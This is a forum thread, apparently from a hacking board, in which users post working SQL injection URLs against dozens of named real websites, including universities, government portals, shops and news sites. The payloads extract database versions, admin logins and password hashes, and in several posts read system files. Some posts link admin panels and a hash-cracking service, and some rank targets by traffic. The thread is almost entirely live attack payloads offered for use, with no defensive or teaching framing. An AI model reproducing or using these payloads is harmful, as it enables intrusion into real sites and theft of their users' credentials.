
View full version: SQL Injections



WallHack
08.12.2013, 08:28
Active advertising system

dork: intext:"POWERED BY SHOPFORBUX.RU"

PoC:


Code:
_http://kassirbux.ru/news.php?id=0%27+union+select+1,2,3,4+--+



Code:
_http://www.wm-explorer.ru/news.php?id=0%27+union+select+1,usename,3,4+FROM+t b_users+--+



Code:
_http://wm-cap.ru/news.php?id=0%27+union+select+1,username,password, 4+FROM+tb_users+--+



Code:
_http://www.web-sprint.ru/news.php?id=0%27+union+select+1,username,password, 4+FROM+tb_users+--+



Code:
_http://piar-bux.ru/news.php?id=0%27+union+select+1,username,password, 4+FROM+tb_users+--+



Code:
_http://vicap.ru/news.php?id=0%27+union+select+1,username,password, 4+FROM+tb_users+--+



Code:
_http://bux1.php-market.ru/news.php?id=0%27+union+select+1,username,password, 4+FROM+tb_users+--+



Code:
_http://comfymoney.ru/news.php?id=0%27+union+select+1,username,password, 4+FROM+tb_users+--+

Unknown
08.12.2013, 17:56
Code:
http://www.capochino.it/article.php?id=-151+union+select+1,0x4861636b6564206279205365706f, 3,4,5,6,7,8,9,10--



Code:
http://www.aessweb.com/journal-detail.php?id=-5003+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18--

kingbeef
10.12.2013, 04:48
TIC 1300


http://www.archipelag.ru/ru_mir/religio/gko/conception/journalism'+and(select+1+from(select+count(*),conc at((select+table_name+from+information_schema.tabl es+limit+0,1),floor(rand(0)*2))x+from+information_ schema.tables+group+by+x)a)--+g


Duplicate entry 'CHARACTER_SETS1' for key 1

Unknown
10.12.2013, 22:11
Code:
http://www.romania.ici.ro/en/turism/pagina.php?id=-426+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),user(),database()),8,9,10,11,12,13--



Code:
http://apiexchange.com/index_main.php?id=-13+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7--



Code:
http://www.snr.gov.ar/imprimir.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9,10,11,12--



Code:
http://www.mobil-com.cz/downloads_info.php?id=-79+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+

WallHack
11.12.2013, 12:55
Code:
http://www.efbw.eu/news.php?ID=59+union+select+1,concat_ws(0x3a,versi on(),user(),database()),3,4,5+--+

comynicator
11.12.2013, 17:25
_ttp://www.futuresfins.com/fin-detail.php?id=-173+union+select+concat_ws(0x3a,version(),user(),d atabase()),2,3,4,5,6,7,8,9,10,11+--+

WallHack
11.12.2013, 17:44
Code:
http://www.northernoutpost.com/news.php?id=99+union+select+1,2,3,concat_ws(0x3a,v ersion(),user(),database()),5,6,7,8+--+

DezMond™
12.12.2013, 16:36
PR7

http://www.uni-erlangen.de/studium/studienangebot/uebersicht/studiengang-anzeige.php?id=-239+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63+--+

Couldn't find the admin panel(

RoksHD
12.12.2013, 18:33
Code:
http://www.injury-advocates.com/wp-content/plugins/formcraft/form.php?id=3+union+SELECT+1,2,3,concat_ws(0x3a,ve rsion(),user(),database()),5,6,7,8,9,10,11+--

Unknown
12.12.2013, 19:51
Code:
http://www.moreanartscenter.org/news.php?id=-3119+union+select+1,0x4861636b6564206279205365706f ,concat_ws(0x3a,version(),user(),database()),4,5,6 ,7,8,9,10,11,12--



Code:
http://www.transitionceo.com/news.php?id=-41'+union+select+1,2,0x4861636b6564206279205365706 f,4,concat_ws(0x3a,version(),user(),database()),6, 7,8,9,10+--+



Code:
http://www.henleystandard.co.uk/news/news.php?id=-999+union+select+1,2,3,@@basedir,5,0x4861636b65642 06279205365706f,concat_ws(0x3a,version(),user(),da tabase()),8,9,10,11,12--

WallHack
13.12.2013, 08:35
TIC 0 PR 6


Code:
http://unilag.edu.ng/news.php?id=-32+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20+--+

Unknown
13.12.2013, 17:17
Code:
http://eyesurgeryeducation.org/resources-news.php?id=-30+union+select+1,0x4861636b6564206279205365706f,3 ,4--



Code:
http://www.e-portal.com.ua/news.php?id=-11+union+select+1,0x4861636b6564206279205365706f,3 ,4,concat_ws(0x3a,version(),user(),database()),6,7 ,8,9,10,11,12,13--



Code:
http://www.stragtur.com/news.php?news=-28+union+select+1,0x4861636b6564206279205365706f,3 ,concat_ws(0x3a,version(),user(),database()),5,6,7--

WallHack
14.12.2013, 14:52
Code:
http://charliemars.com/news.php?id=-165+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6+--+

Улыбайся
14.12.2013, 21:27
++++


http://www.moto-hobby.ru/parts.php?id=-8780%27+union+select+1,2,3,4,@@version,6,7,8,9,10+ %20--+




http://loft8.ru/factories/?brand=-Il%20Loft%27+union+select+1,2,3,4,@@version,6,7,8, 9,10+--+

WallHack
15.12.2013, 07:24
Code:
http://www.bcnaerospace.org/public/new.php?id=-117'+union+select+1,2,3,concat_ws(0x3a,version(),u ser(),database()),5,6,7+--+

Unknowhacker
15.12.2013, 15:33
Marine and Yacht Equipment


Code:
http://www.zhigunov.com.ua/index.php?act=motor&sub_motor=-6+union+select+1,2,3,4,5,6,7,8,9,10,%28select%28@x %29from%28select%28@x:=0x00%29,%28select%28null%29 from%28zhigunov_zhigunov.adminarea%29where%280x00% 29in%28@x:=concat%28@x,0x3c62723e,login,0x3a,pass% 29%29%29%29x%29,12,13,14,15+--+

Admin panel (http://www.zhigunov.com.ua/admin/)

Note: We decrypt the hash here (https://crackstation.net/)

WallHack
16.12.2013, 15:17
COUNCIL of European Aerospace SOCIETIES


Code:
http://www.ceas.org/members.php?id=-8+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28+--+

Unknown
16.12.2013, 22:49
Code:
http://sips.inesc-id.pt/people.php?id=-93+union+select+concat_ws(0x3a,version(),user(),da tabase()),2,3,4,5,0x4861636b6564206279205365706f,7 ,8,9,10--

ocheretko
17.12.2013, 06:41
Code:
http://jootem.me/wp-content/plugins/formcraft/form.php?id=53+UNION+SELECT+1,2,3,user_pass,5,6,7, 8,9,10,11+FROM+wp_users+WHERE+id=1

YaBtr
17.12.2013, 16:27
pr:7


http://
www.upt.ro
/en/pagina_princ.php?cat=nu_pagini+union+select+1,vers ion(),3,4,5,6,7,8,9+--+&id=ORnyx


see the source code (line 1958)

================================================


http://
www.select-ing.es
/oferta.php?ID=676+and 1=2+union+select+version(),2,3,4,5,6,7,8,9,10,11,1 2+--+


================================================


http://
www.amigos.org.uk
/news-item.asp?id=72' and row(1,1)>(select count(*),concat((select password from adminusers),0x3a,floor(rand(0)*2))x from information_schema.tables group by x) and '1'='1


================================================


http://
www.sanctuarygreen.com.sg
/dev/label.php?id=14 || 1 group by concat((select version()),0x00,floor(rand(0)*2))having min(0)+--+


================================================


http://
www.girlsoftheserviceindustry.com
/girl.php?id=13+and+1=2+union+select+1,2,3,4,5,vers ion(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33+--+


================================================

Br@!ns
17.12.2013, 18:04
http://cards.chelni.ru/search.php?event_id=-21'+union+select+concat_ws(':',user(),version())+--+


File_priv= Y

WallHack
18.12.2013, 14:32
Code:
http://www.intercoursevillage.com/members.php?ID=35'+union+select+1,concat_ws(0x3a,v ersion(),user(),database()),3,4,5,6,7,8,9,10+--+

YaBtr
19.12.2013, 19:04
pr:3

TIC:10


http://
www.vdv-tv.by
/index.php?razdel=11&video=417+and+1=2+union+select+1,2,3,4,concat_ws(0 x3a,login,email),6,7,8,9,10,11 from users+--+


administrator:asm@xaker.ru

=================================================

Unknown
20.12.2013, 01:28
Code:
http://www.warrenhouse.com/event.php?id=-163+union+select+1,0x4861636b6564206279205365706f, 3,4,5,6,concat_ws(0x3a,version(),user(),database() ),8,9,10,11,12,13,14,15--



Code:
http://www.threedomsolutions.co.uk/news.php?id=-54+union+select+1,2,0x4861636b6564206279205365706f ,concat_ws(0x3a,version(),user(),database()),5,6,7--



Code:
http://www.redjuderias.org/red/boletin.php?lang=2&id=-76+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5--

line 318 - 5.0.51a-24+lenny5:juderias@localhost:juderias

OxoTnik
20.12.2013, 04:18
http://www.jump-shot.net/schedule.php?cat=-8+union+select+1,version(),3


5.1.66-0+squeeze1-log

WallHack
20.12.2013, 11:23
Code:
http://ggdgcolombia.co/entrevista-1.php?id=-1+UnIon+selECt+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23+--+

-----------------------------------------------------------------


Code:
http://www.maratonstav.cz/page.php?id=-143+union+select+1,2,concat_ws(0x3a,version(),user (),database())+--+

OxoTnik
20.12.2013, 22:26
http://www.klf-75.ru/member.php?id=-30+union+select+1,2,version(),4,5,6,7,8,9,0,1




5.6.13

WallHack
21.12.2013, 09:21
One of the most successful companies on the Moldovan market in alcohol distribution )


Code:
http://repost.md/theme/main.php?id=-13'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 16,16,17+--+&lang=1

Unknown
21.12.2013, 23:45
Code:
http://www.galapagospark.org/boletin.php?noticia=-813+union+select+1,2,3,4,5,6,7,0x4861636b656420627 9205365706f,concat_ws(0x3a,version(),user(),databa se()),10,11,12,13,14,15--



Code:
http://www.sanchezdevanny.com/boletin.php?lang=en&id=-56+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,0x4861636b6564206279205365706f ,8,9--



Code:
http://www.wepler.com/actualite.php?id=-3+union+select+1,2,@@version,4--

WallHack
22.12.2013, 06:19
Active advertising system

Active advertising system TIC 20 PR 2

Total users 18436

Total paid out 53190.02 rub.


Code:
http://www.seopromox.net/forum_posts.php?th=0'+union+select+1,concat_ws(0x3 a,version(),user(),database()),3,4+--+

Admin's email


Code:
http://www.seopromox.net/forum_posts.php?th=0'+union+select+1,email,3,4+FRO M+tb_users+--+

Admin's password


Code:
http://www.seopromox.net/forum_posts.php?th=0'+union+select+1,password,3,4+ FROM+tb_users+--+

Br@!ns
22.12.2013, 20:13
miel.ru


http://zd.miel.ru/exporter/sendmail.php?person=12442+union+select+concat_ws(' :',user(),version(),database())+--+

Unknown
22.12.2013, 23:28
Code:
http://www.jetonfireplace.com/ProductInfo.php?id=-818+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19--



Code:
http://www.luckyinyourbox.com/productinfo.php?id=-333+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15--



Code:
http://linksfashionmall.net/productinfo.php?id=-449+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15



Code:
http://cgl-gabon.com/?p=ref&cat=2&scat=5&ref=-6+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8,9,10--



Code:
http://www.itshuetamo.edu.mx/indexSec.php?id=-8+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7--

Unknowhacker
25.12.2013, 18:12
Telephone area codes of Ukrainian cities


Code:
http://k-g-u.ru/moduls/kodgoroda.php?gorod=13921+and+1=0+union+select+1,2 ,3,4,%28select%28@x%29from%28select%28@x:=0x00%29, %28select%28null%29from%28kodcity_kod.admin%29wher e%280x00%29in%28@x:=concat%28@x,0x3c62723e,login,0 x3a,password%29%29%29%29x%29,6,7,8+--+

Note: Admin panel (http://k-g-u.ru/cpanel) - profit!

/this is not an admin panel, it's cpanel - Konqi

kingbeef
27.12.2013, 23:27
Bi-2 official site

http://bdva.ru/konserts.phtml?id=-80+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a,user(),version()),12,13,14--+f

YaBtr
31.12.2013, 12:55
Happy New Year, friends!


http://
www.avangard-salon.ru
/magaz/magaz.php?t=1&id=10'+and 1=2+union+select+1,2,concat(user,0x3a,pass),4,5,6 from userlist+--+


=================================================


http://
www.hailstudio.com
/client.php?id=79'+union+select+1,version(),3,4,5,6 ,7,8,9,10,11,12,13,14,15+--+


=================================================

pr:5


http://
www.southernhealth.ca
/service.php?id=6+and+1=2+union+select+1,version(), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24+--+


=================================================


http://
www.scientific-search.com
/es/oferta.php?id=0000000219'+and+1=2+union+select+1,2 ,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20+--+


=================================================


http://
www.chriswins.com
/victory.php?id=51+and+1=2+union+select+1,version() ,3,4,5,6+--+


=================================================


http://
www.robertfritz.com
/index.php?content=about' or 1=1 and @a:=1 group by concat(version(),if(@a=0,@a:=1,@a:=0))having min(0)+--+


=================================================


http://
www.firmy.karlovarska.net
/firma.php?ID=5686'+and+1=2+union+select+1,2,3,4,5, 6,7,8,9,version(),11,12+--+


=================================================


http://
www.compassheights.com.sg
/dev/label.php?id=13+or+1+group+by+concat((select+versi on()),0x00,floor(rand(0)*2))having+min(0)+--+


=================================================


http://
www.atolbsl.co.uk
/service.php?id=5+or+1+group+by+concat((select+vers ion()),0x00,floor(rand(0)*2))having+min(0)+--+


=================================================


http://
www.gcbcalendar.com
/events/event.php?event_id=24718+and 1=2+union+select+1,2,3,4,5,6,7,(select(@x)from(sel ect(@x:=0x00),(select(0)from(gcbcalen_live.user)wh ere(0x00)in(@x:=concat(@x,0x3c62723e,login,0x3a,pa ssword,0x3a,email_address))))antichat),9,10,11,12, 13,14,15,16,17,18,19,20+--+


=================================================


http://
www.poiplie.sk
/clanok.php?chlan=eng&akcia=&id=6'+union+select+1,2,3,4,5,6,7,version(),9,10,11 +--+


=================================================


http://
www.galeriexxl.cz
/dila/rano.php?akce=koupit&id=-5143'union select 1,(select(@x)from(select (@x:=0x00),(select(0)from(wrs_galeriexxl_cz.users) where(0x00)in(@x:=concat(@x,0x3c62723e,username,0x 3a,pw,0x3a,users_admin))))x),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+


=================================================


http://
www.wakyo.jp
/distribution/label.php?id=485+and+1=2++union+select+1,2,3,4,5,6 ,7,concat_ws(0x3a,user_login,user_pass),9 from wp_users+--+


=================================================


http://
www.campingiratxe.com
/en/offers/oferta.php?id=32'+union+select+1,version(),3,4+--+


=================================================


http://
www.klopina.cz
/kultura.php?id=80+union+select+1,version(),3,4,5+--+


=================================================

Улыбайся
31.12.2013, 19:14
----------------------


http://www.inion.ru/pers_about.html?id=-15+union+select+1,2,3,4,@@version,6,7,8,9,10,11+--+

Unknown
04.01.2014, 19:51
Code:
http://www.kiamarina.com.au/showboat.php?id=-23+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws (0x3a,version(),user(),database())--

DezMond™
05.01.2014, 15:20
PR7

http://www.leuphana.de/services/career-service/veranstaltungsprogramm/zurueckliegende-semester/archiv.html?s_titel=Wintersemester%202008/09&semester=ws0809+union+all+select+1,user(),3+--+

careerservice@www.leuphana.de

Unknown
05.01.2014, 17:28
Code:
http://www.aupassportphoto.com.au/category.php?id=-2+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9--

HellFire
06.01.2014, 21:39
RETROCUSTOMSHOP – the retro custom car movement in Russia.


Code:
http://retrocustomshop.com/?page=item&id=1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Data base(),0x2F2A2A2F,User())--

Database Version: 5.1.49-rel11.3-log

Database name: retrocustomshop

User name: 043143006_rcs@localhost

The output is in the source code.

TIC: 0

PR: 1

Timon132009
08.01.2014, 03:52
Code:
http://www.iop.vast.ac.vn/ccp/member.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55



Code:
http://www.skiallday.co.uk/shop/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a ,version(),user(),database()),12,13,14,15,16



Code:
http://gdecarli.it/php/index.php?var1=1&var2=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database())

Unknown
12.01.2014, 15:44
Code:
http://consult.nida.ac.th/en/project_detail.php?id=-123+union+select+1,2,3,4,5,@@basedir,7,concat_ws(0 x3a,version(),user(),database()),9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--

kingbeef
13.01.2014, 03:17
TIC 2600

PR 6

http://belapan.com/archive/2013/06/24/632924/'or(ExtractValue(1,concat(0x3a,(select(table_name) from(information_schema.tables)limit/**/0,1))))='1

WallHack
13.01.2014, 18:55
Active Advertising System 10 TIC 1 PR


Code:
http://wrcbux.ru/forum_posts.php?th=0'+union+select+1,concat_ws(0x3 a,version(),user(),database()),3,4+--+

OxoTnik
17.01.2014, 00:25
http://www.vampodarok.com/congrad.php?filterid=-140+union+select+1,@@version,3,4,5,6,7


http://f6.s.qip.ru/E2nOmT8j.jpg

OxoTnik
17.01.2014, 07:14
http://www.skkdc.ru/index.php?mod=nov_pod&id=-77+union+select+1,user(),3,table_name,5,6,7+from+i nformation_schema.tables

kingbeef
17.01.2014, 23:20
Porn.

5xxx.ru 95k traffic per day


http://www.5xxx.ru/porno-foto/'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1


pornosector.ru 30k traffic per day


http://pornosector.ru/incest-video.html'or(ExtractValue(1,concat(0x3a,(select(v ersion())))))='1

Unknown
18.01.2014, 01:54
Code:
http://www.atlantic.edu/about/news/article.php?article=-1175+union+select+1,0x4861636b6564206279205365706f ,concat_ws(0x3a,version(),user(),database()),4,5,6 ,7,8,9,10,11,12--

Unknown
21.01.2014, 00:17
Code:
http://www.metz-handball.com/jeune.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,0x4861636b6564206279205365706f,5--

WallHack
23.01.2014, 12:21
http://seo-clic.besaba.com/forum_posts.php?th=0%27+union+select+1,version(),3 ,4+--+

kingbeef
23.01.2014, 14:58
Lenta.ru

TIC 23000

1kk traffic per day

http://strana.lenta.ru/latvia'or(ExtractValue(1,concat(0x3a,(select(load_ file(0x2F6574632F706173737764))))))='1

n3m1s
23.01.2014, 20:41
Code:
http://ua.nissan.ua/rus/media/show.php?a=cars&c_id=-1+union+select+1,2,3,concat(version(),0x3a,0x3a,us er())--

5.0.95-log::c13nissanua@localhost

danil7493
24.01.2014, 10:31
Code:
http://www.pfa.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://www.kubten.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://www.agppk.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://karasukpedcollege.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://aist.pedcollege.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://tm53.msk.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://gbou-bpt.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://www.volgmet.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://www.gouspt.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://www.detak.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://college31.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://www.kraspu19.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://www.ymk-salekhard.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://www.vozatt.ru/aist/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://vket29.ru/aist/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://rcstv.omgtu.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://mpk1.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://www.rgpk-revda.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://www.vil-kit.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

http://www.rub-rpc.ru/index.php?option=com_aist&view=vacancylist&contact_id=-3+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(userna me,0x3a,password,0x3a,email,0x3a),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36+from+jos_users--

YaBtr
28.01.2014, 15:46
http://
www.juriedartservices.com
/index.php?content=event_info&event_id=754+and+1=2+union+select+1,2,
load_file(0x2f6574632f706173737764)
,4,5,6,7,8+--+


file_priv=Y

=================================================

nemaniak
29.01.2014, 16:42
socialblade.com Alexa-5k PR-5 >100k traffic


Code:
http://socialblade.com/digg/diggfpdata.php?id=20120329022427:465b6e9b-2d02-4f85-9395-abb5959da5cd%27%20UNION%20SELECT%201,2,3,4,5,6,7,c oncat_ws%280x3a,version%28%29,user%28%29,database% 28%29%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30%23



Code:
5.5.35-0ubuntu0.12.04.1:digg@localhost:digg

kingbeef
30.01.2014, 03:00
afisha.ru


TIC 9400


http://internet.afisha.ru/katya-detkina'or(ExtractValue(1,concat(0x3a,(select(vers ion())))))='1

n3m1s
30.01.2014, 12:21
http://img844.imageshack.us/img844/8020/2k7k.png


Code:
http://www.infiniti-taganka.ru/company/news.php?id=-36%27+union+select+1,2,3,4,concat(version(),0x203c 666f6e7420636f6c6f723d7265643e3a3a3c2f666f6e743e20 ,user(),0x203c666f6e7420636f6c6f723d7265643e3a3a3c 2f666f6e743e20,database(),0x203c666f6e7420636f6c6f 723d7265643e3a3a3c2f666f6e743e20,0x203c623e3c666f6 e7420636f6c6f723d7265643e6e336d31733c2f666f6e743e3 c2f623e),6,7,8,9+--+

5.5.35-0ubuntu0.13.10.1 :: mikle@localhost :: autocenter

Unknown
31.01.2014, 01:37
Code:
http://www.atlantic.edu/about/news/article.php?article=-1175+union+select+1,0x4861636b6564206279205365706f ,concat_ws(0x3a,version(),user(),database()),4,5,6 ,7,8,9,10,11,12--

AC//DC
01.02.2014, 13:04
http://www.spin-spb.ru/item.php?code=-1266+union+select+1,@@version,3,4,5,6,7,8,9,10,11--

5.5.35-0ubuntu0.12.04.2

Unknown
01.02.2014, 23:21
Code:
http://ibaysilvershop.com/index.php?id=-7+union+select+1,@@basedir,concat_ws(0x3a,version( ),user(),database())--&content=HI



Code:
5.1.73-log:dbo295017473@74.208.16.253:db295017473



Code:
/USR/LOCAL/MYSQL-5.1.73-LINUX-I686-GLIBC23/

MaxFast
02.02.2014, 01:05
http://savepic.net/4464751.png


Code:
http://www.vsegda.tv/index.php?mod=genre&id=-15'+union+select+1,concat(version(),0x203a3a20,use r(),0x203a3a20,database(),0x203a3a20,0x6e336d3173) ,3,4+--+

5.1.70 :: vsegdatv_u5218@localhost :: vsegdatv_u5218

kingbeef
02.02.2014, 15:35
http://www.astbury.leeds.ac.uk/Report/download_report.php?id=94-9.999+union+select+1,2,3,4--

http://www.astbury.leeds.ac.uk/Report/download_report.php?id=94-9.999+union+select+1,2,3,version()--

Unknown
03.02.2014, 16:46
Code:
http://ultimatehomedesign.com/news-detail.php?id=-312+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),user(),database()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24--

Unknowhacker
05.02.2014, 16:40
Pipeline fittings +"fine filters"


Code:
http://armaturka.com.ua/index.php?id=-87%27+/*!union*/+SeLect+1/*!,*/2/*!,*/3/*!,*/4/*!,*/5/*!,*/6/*!,*/version%28%29/*!,*/8/*!,*/9/*!,*/10+--+

Version: 5.1.69-cll-lve

Unknown
05.02.2014, 22:04
Code:
http://fodtennis.dk/news_view.php?id=-22+union+select+1,@@version,3,4,5--

5.1.61-0+squeeze1

MaxFast
06.02.2014, 01:42
Code:
http://bloodymilk.com/site/news_detail.php?id=-1+union+select+1,2,3,4,concat(user(),0x203a3a20,da tabase(),0x203a3a20,0x3c666f6e7420636f6c6f723d7265 643e6e336d31733c2f666f6e743e),6--

bloodym_admin@localhost :: bloodym_site

Unknowhacker
06.02.2014, 18:07
Code:
http://www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,%28select%28@x%29from%28select% 28@x:=0x00%29,%28select%28null%29from%28informatio n_schema.columns%29where%28table_schema!=0x696e666 f726d6174696f6e5f736368656d61%29and%280x00%29in%28 @x:=concat%28@x,0x3c62723e,table_schema,0x2e,table _name,0x3a,column_name%29%29%29%29x%29,3,4,5,6,7,8 ,9,10,11+--+

YaBtr
06.02.2014, 19:24
pr: 6

TIC: 50


